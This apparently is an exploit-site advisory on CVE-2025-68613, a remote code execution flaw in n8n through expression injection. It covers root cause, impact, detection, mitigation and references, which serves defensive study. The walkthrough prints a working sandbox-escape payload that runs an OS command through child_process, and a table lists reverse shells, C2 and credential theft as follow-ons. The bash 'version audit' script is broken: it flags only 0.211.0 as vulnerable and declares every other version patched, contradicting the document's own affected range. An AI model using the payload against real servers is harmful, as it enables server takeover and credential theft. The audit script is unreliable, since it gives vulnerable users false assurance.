Share
## https://sploitus.com/exploit?id=17C9C674-BB41-515E-B7A1-92845FADBC84
---


  


## ๐Ÿ“‘ Table of Contents
- [๐ŸŽฏ Executive Summary](#-executive-summary)
- [๐Ÿ› The Vulnerability](#-the-vulnerability)
- [๐Ÿ”ฌ Technical Analysis](#-technical-analysis)
- [๐Ÿ’€ Exploitation Walkthrough](#-exploitation-walkthrough)
- [๐Ÿ’ฅ Impact Assessment](#-impact-assessment)
- [๐Ÿ” Detection & Response](#-detection--response)
- [๐Ÿ›ก๏ธ Mitigation Strategy](#%EF%B8%8F-mitigation-strategy)
- [๐Ÿ“š References](#-references)

---

## ๐ŸŽฏ Executive Summary


  


CVE-2025-68613 is a **critical remote code execution vulnerability** in n8n's workflow automation platform that allows authenticated attackers to execute arbitrary system commands through **expression injection**. 





### โšก Quick Stats

| ๐Ÿ”ฅ Metric | ๐Ÿ“Š Value |
|-----------|----------|
| **CVSS Score** | 9.9 / 10 |
| **Exposed Instances** | 103,476+ |
| **Attack Complexity** | LOW |
| **Auth Required** | Yes (Low Priv) |
| **User Interaction** | None |




### ๐ŸŽฏ Key Facts

| ๐Ÿ“Œ Property | ๐Ÿ“ Value |
|-------------|----------|
| **Disclosed** | Dec 18, 2025 |
| **Vector** | Network (AV:N) |
| **Scope** | Changed |
| **Impact** | CIA = HIGH |
| **Exploit Type** | Expression Injection |





---

## ๐Ÿ› The Vulnerability


  


### ๐Ÿ“‹ CVE Overview

| Property | Value |
|----------|-------|
| ๐Ÿ†” **CVE ID** | CVE-2025-68613 |
| ๐Ÿ“Š **CVSS Score** | 9.9 (Critical) ๐Ÿ”ด |
| ๐Ÿ”— **CVSS Vector** | `CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H` |
| ๐Ÿท๏ธ **CWE** | CWE-913 (Improper Control of Dynamically-Managed Code Resources) |
| ๐Ÿ“ฆ **Affected Versions** | 0.211.0 โ†’ 1.120.3, 1.121.0 |
| โœ… **Patched Versions** | 1.120.4, 1.121.1, 1.122.0+ |

### ๐Ÿค– What is n8n?

n8n is an open-source workflow automation platform enabling **no-code/low-code integration** across 400+ applications. It's widely deployed in:

| ๐Ÿข Use Case | ๐Ÿ“ Description |
|-------------|----------------|
| ๐Ÿ”ง **DevOps** | Automation pipelines, CI/CD integrations |
| ๐Ÿ›ก๏ธ **Security Ops** | SOAR workflows, incident response |
| ๐Ÿ’ผ **Business** | Process automation, data workflows |
| ๐Ÿ“Š **Data** | ETL processes, API integrations |

### ๐Ÿ”ง Technical Root Cause

```
๐Ÿ”“ VULNERABILITY CHAIN:
โ”Œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”
โ”‚  ๐Ÿ“ n8n Expression Language โ†’ Dynamic Data Handling            โ”‚
โ”‚                           โ†“                                     โ”‚
โ”‚  โš ๏ธ  Insufficient Sandbox Isolation in Server-Side Eval        โ”‚
โ”‚                           โ†“                                     โ”‚
โ”‚  ๐Ÿ’€ Malicious Expression Escapes Sandbox                       โ”‚
โ”‚                           โ†“                                     โ”‚
โ”‚  ๐Ÿ–ฅ๏ธ  Access to Node.js child_process Module                    โ”‚
โ”‚                           โ†“                                     โ”‚
โ”‚  ๐Ÿ’ฅ FULL RCE - OS Command Execution                            โ”‚
โ””โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”˜
```

---

## ๐Ÿ”ฌ Technical Analysis


  


### ๐ŸŽฏ Attack Surface

**Prerequisites for Exploitation:**
| # | ๐Ÿ“‹ Requirement | ๐Ÿ“ Details |
|---|----------------|------------|
| 1๏ธโƒฃ | **Authentication** | Valid n8n user account (low-privilege sufficient) |
| 2๏ธโƒฃ | **Permissions** | Workflow creation/editing capability |
| 3๏ธโƒฃ | **Network Access** | Ability to reach n8n instance |

### โš”๏ธ Attack Characteristics

| ๐Ÿท๏ธ Attribute | ๐Ÿ“Š Value | ๐Ÿ”ฅ Risk |
|--------------|----------|---------|
| **Complexity** | LOW (AC:L) | ๐Ÿ”ด High |
| **User Interaction** | None Required | ๐Ÿ”ด High |
| **Scope** | Changed | ๐Ÿ”ด Critical |

### ๐Ÿ—บ๏ธ Vulnerability Flow Diagram

```mermaid
graph TD
    A[๐Ÿ” Authenticated User] -->|Creates| B[๐Ÿ“ New Workflow]
    B -->|Injects| C[๐Ÿ’€ Malicious Expression]
    C -->|Triggers| D[โšก Expression Evaluation]
    D -->|Exploits| E[๐Ÿ”“ Sandbox Escape]
    E -->|Accesses| F[๐Ÿ–ฅ๏ธ Node.js Runtime]
    F -->|Executes| G[๐Ÿ’ฅ OS Command via child_process]
    G -->|Achieves| H[โ˜ ๏ธ FULL SERVER COMPROMISE]
    
    style A fill:#4CAF50,color:#fff
    style C fill:#ff9800,color:#fff
    style E fill:#f44336,color:#fff
    style H fill:#9c27b0,color:#fff
```

---

## ๐Ÿ’€ Exploitation Walkthrough


  


> โš ๏ธ **DISCLAIMER**: The following is for **educational purposes only**. Unauthorized exploitation is illegal.

### ๐Ÿ“ธ Step-by-Step Exploitation Screenshots

#### ๐Ÿ–ฅ๏ธ Step 1: Access n8n Instance
Initial access to vulnerable n8n workflow automation platform.


  
  
  ๐Ÿ”“ n8n Welcome Dashboard - Entry Point


---

#### โž• Step 2: Create New Workflow
Create a new workflow that will contain the malicious payload.


  
  
  ๐Ÿ“ Creating new workflow with "Add first step"


---

#### โšก Step 3: Add Manual Trigger
Configure workflow trigger - Manual Trigger allows on-demand execution.


  
  
  ๐ŸŽฏ Selecting Manual Trigger for workflow activation


---

#### ๐Ÿ“ฆ Step 4: Add Set Node
Add the "Edit Fields (Set)" node which will contain the malicious expression.


  
  
  ๐Ÿ”ง Adding "Edit Fields (Set)" node for payload injection


---

#### ๐Ÿ’‰ Step 5: Inject RCE Payload
The critical step - injecting the sandbox escape expression to achieve RCE.


  
  
  ๐Ÿ’€ Malicious expression executes 'id' command successfully!


```javascript
// ๐Ÿ”ด MALICIOUS PAYLOAD (DO NOT USE ILLEGALLY)
{{ (function(){ return this.process.mainModule.require('child_process').execSync('id').toString(); })() }}
```

**Output Shows:** `uid=1000(node) gid=1000(node) groups=1000(node)` โœ… **RCE CONFIRMED!**

---

### ๐ŸŽฌ Attack Kill Chain



| Phase | ๐Ÿ”ฅ Action | ๐Ÿ’€ Impact |
|-------|----------|-----------|
| 1๏ธโƒฃ | **Initial Access** | Authenticate to n8n |
| 2๏ธโƒฃ | **Execution** | Submit malicious workflow |
| 3๏ธโƒฃ | **Persistence** | Deploy reverse shell/backdoor |
| 4๏ธโƒฃ | **C2** | Establish command & control |
| 5๏ธโƒฃ | **Actions** | Exfiltrate data, lateral movement |



### โ˜ ๏ธ Post-Exploitation Capabilities

| ๐ŸŽฏ Action | ๐Ÿ’ฅ Impact Level |
|-----------|-----------------|
| ๐Ÿ”‘ **Credential Theft** | Extract API keys, OAuth tokens, DB passwords |
| ๐Ÿ“ค **Data Exfiltration** | Workflow data, execution logs, business info |
| ๐Ÿ”’ **Persistence** | Cron jobs, startup scripts, web shells |
| ๐Ÿ”€ **Lateral Movement** | Pivot to databases, CI/CD, cloud infra |
| ๐Ÿ—‘๏ธ **Workflow Manipulation** | Modify/destroy automation logic |

---

## ๐Ÿ’ฅ Impact Assessment


  


### ๐Ÿ”บ CIA Triad Analysis





#### ๐Ÿ”ด Confidentiality (HIGH)
- ๐Ÿ”‘ API keys exposed
- ๐Ÿ” OAuth tokens leaked
- ๐Ÿ’พ DB passwords accessible
- ๐Ÿ“œ Execution logs compromised




#### ๐ŸŸ  Integrity (HIGH)
- ๐Ÿ“ Workflows altered
- โš™๏ธ Automation corrupted
- ๐Ÿ’‰ Malicious nodes injected
- ๐Ÿ“Š Data manipulated




#### ๐ŸŸก Availability (HIGH)
- โน๏ธ Services disrupted
- ๐Ÿ’€ Resources exhausted
- ๐Ÿ”„ Workflows terminated
- ๐Ÿ–ฅ๏ธ Infrastructure down





### ๐ŸŒ Real-World Exposure


  


---

## ๐Ÿ” Detection & Response


  


### ๐Ÿ”Ž Detection Strategies

| # | ๐Ÿ“‹ Method | ๐Ÿ” What to Monitor |
|---|-----------|-------------------|
| ๐Ÿ“œ | **Log Analysis** | Unusual commands from n8n process, failed expressions |
| ๐ŸŒ | **Network** | Outbound connections to unknown IPs, large POST requests |
| โšก | **Runtime** | `child_process` invocations, unexpected spawns |
| ๐Ÿ“ฆ | **Version Audit** | Check against vulnerable version range |

### ๐Ÿ› ๏ธ Version Audit Script

```bash
#!/usr/bin/env bash
# ๐Ÿ” CVE-2025-68613 n8n version audit

echo "๐Ÿ” Checking n8n version..."

if command -v n8n >/dev/null 2>&1; then
    VER="$(n8n --version | tr -d 'v' | head -n1)"
    
    if [[ "$VER" = "0.211.0" ]]; then
        echo "โš ๏ธ  VULNERABLE: n8n $VER affected by CVE-2025-68613"
        echo "๐Ÿ“ฆ Required: Upgrade to 1.120.4, 1.121.1, or 1.122.0+"
        exit 2
    else
        echo "โœ… SAFE: n8n $VER is patched"
    fi
else
    echo "โŒ n8n not found in PATH"
fi
```

### ๐Ÿšจ Incident Response Checklist

- [ ] ๐Ÿ”Œ **Isolate** - Disconnect affected n8n from network
- [ ] ๐Ÿ’พ **Preserve** - Capture logs and forensic artifacts  
- [ ] ๐Ÿ” **Audit** - Review all workflows for malicious expressions
- [ ] ๐Ÿ”„ **Rotate** - Change all accessible credentials
- [ ] ๐Ÿ”€ **Review** - Check for lateral movement indicators
- [ ] ๐Ÿ“ฆ **Patch** - Upgrade to secure version before restoration

---

## ๐Ÿ›ก๏ธ Mitigation Strategy


  


### โšก Immediate Actions (Priority 0)

| ๐Ÿ”ข Priority | ๐Ÿ› ๏ธ Action | ๐Ÿ“ Details |
|-------------|----------|------------|
| ๐Ÿ”ด **P0** | **PATCH NOW** | Upgrade to 1.120.4, 1.121.1, or 1.122.0+ |
| ๐ŸŸ  **P1** | Restrict Access | Limit workflow creation to trusted users |
| ๐ŸŸก **P2** | Container Hardening | Deploy with security restrictions |

### ๐Ÿณ Container Hardening Example

```dockerfile
# ๐Ÿ›ก๏ธ Hardened n8n deployment
FROM n8n/n8n:1.122.0

# ๐Ÿ‘ค Run as non-root user
USER node

# ๐Ÿ”’ Apply these runtime flags:
# --read-only --tmpfs /tmp:rw,noexec,nosuid
# --cap-drop=ALL --cap-add=NET_BIND_SERVICE
# --security-opt seccomp=n8n-seccomp.json
```

### ๐Ÿ” Long-Term Security

| ๐Ÿ›ก๏ธ Measure | ๐Ÿ“ Implementation |
|------------|-------------------|
| ๐ŸŒ Network Segmentation | Isolate n8n instances |
| ๐Ÿ”ฅ WAF Rules | Monitor expression patterns |
| ๐Ÿ“œ Audit Logging | Enable comprehensive logging |
| ๐Ÿ” Security Reviews | Regular workflow assessments |
| ๐Ÿ”“ Least Privilege | Enforce access controls |

---

## ๐Ÿ’ฌ Question for Blue Teamers ๐Ÿ”ต


  


> **How would you design a detection rule to identify expression injection attempts in n8n workflow definitions before execution, considering the need to balance security with legitimate dynamic expression usage?**
>
> **Bonus:** What runtime protections would you implement to limit blast radius if sandbox escape occurs despite patching?

---

## ๐Ÿ“š References


  


### ๐Ÿ“‹ Official Advisories
- ๐Ÿ”— [NVD CVE-2025-68613 Detail](https://nvd.nist.gov/vuln/detail/CVE-2025-68613)
- ๐Ÿ”— [Snyk Advisory](https://security.snyk.io/vuln/SNYK-JS-N8NWORKFLOW-14545463)

### ๐Ÿ”ฌ Technical Analysis
- ๐Ÿ“– [Orca Security: Critical n8n RCE](https://orca.security/resources/blog/cve-2025-68613-n8n-rce-vulnerability/)
- ๐Ÿ“– [Resecurity: Expression Injection Deep Dive](https://www.resecurity.com/blog/article/cve-2025-68613)
- ๐Ÿ“– [SecureLayer7: RCE Exploitation Guide](https://blog.securelayer7.net/cve-2025-68613-n8n-rce-exploitation/)

### ๐ŸŽฎ Practical Resources
- ๐Ÿงช [TryHackMe: CVE-2025-68613 Lab](https://tryhackme.com/room/n8ncve202568613)
- ๐Ÿ’€ [Public PoC Scanner](https://github.com/TheStingR/CVE-2025-68613-POC)

---

## ๐Ÿท๏ธ Tags

```
#CVE-2025-68613 #n8n #RCE #Expression-Injection #Workflow-Automation 
#Sandbox-Escape #CWE-913 #Critical-Vulnerability #Pentesting #Blue-Team
```

---


  



  โš ๏ธ DISCLAIMER: This analysis is for educational and defensive security purposes only.
  Unauthorized exploitation of vulnerabilities is ILLEGAL.